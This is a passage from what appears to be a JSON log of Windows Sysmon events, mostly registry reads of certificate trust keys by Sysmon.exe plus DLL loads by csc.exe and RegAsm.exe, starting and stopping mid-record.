- "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 
131883570860110000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - 
{ - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": 
"C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "psapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 